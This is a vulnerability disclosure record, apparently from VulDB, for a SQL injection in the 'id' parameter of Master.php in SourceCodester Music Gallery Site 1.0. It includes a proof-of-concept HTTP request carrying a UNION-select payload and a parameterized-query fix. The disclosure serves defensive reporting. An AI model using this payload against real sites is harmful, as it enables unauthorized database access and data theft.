| Title | SOURCECODESTER Music Gallery Site 1.0 / Master.php id SQL Injection |
|---|
| Description | Music Gallery Site: Any remote hacker can access the Master.php?f=get_music_details&id=* URL and inject the SQL Injection malicious code on id parameter which is available in GET request
Author Email:
[email protected]
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
Version:
v 1.0
Vulnerable URL:
- URL: php-music/classes/Master.php?f=get_music_details&id=*
Affected Page:
- Master.php
- On this page, there is "get_music_details" in that id parameter is vulnerable to SQL Injection Attack
- URL of the vulnerable parameter is: php-music/classes/Master.php?f=get_music_details&id=*
Description:
The Music Gallery site does have public pages for music library. Whenever someone click on play button any music the popup will appear on the same page. However, on backend server calls the file Master.php, in that file "get_music_details" is running the music and this function Get id parameter is vulnerable to SQL Injection.
Proof of Concept:
Following steps are involved:
1. Go to the music list and click on play button of any music.
2. intercept the traffic through burp and get the actual URL
3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*)
Request:
GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7f
Connection: close
Response:
Any remote attacker can access full system through SQL Injection
Recommendation:
Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:
Example Code:
$sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id");
$sql->bindparam(':id', $id);
$sql->execute();
$row = $sql->fetch(PDO::FETCH_ASSOC); |
|---|
| Source | ⚠️ https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%203.md |
|---|
| User | navaidansari (UID 41266) |
|---|
| Submission | 02/21/2023 13:06 (3 years ago) |
|---|
| Moderation | 02/22/2023 19:12 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221632 [SourceCodester Music Gallery Site 1.0 GET Request Master.php ID sql injection] |
|---|
| Points | 20 |
|---|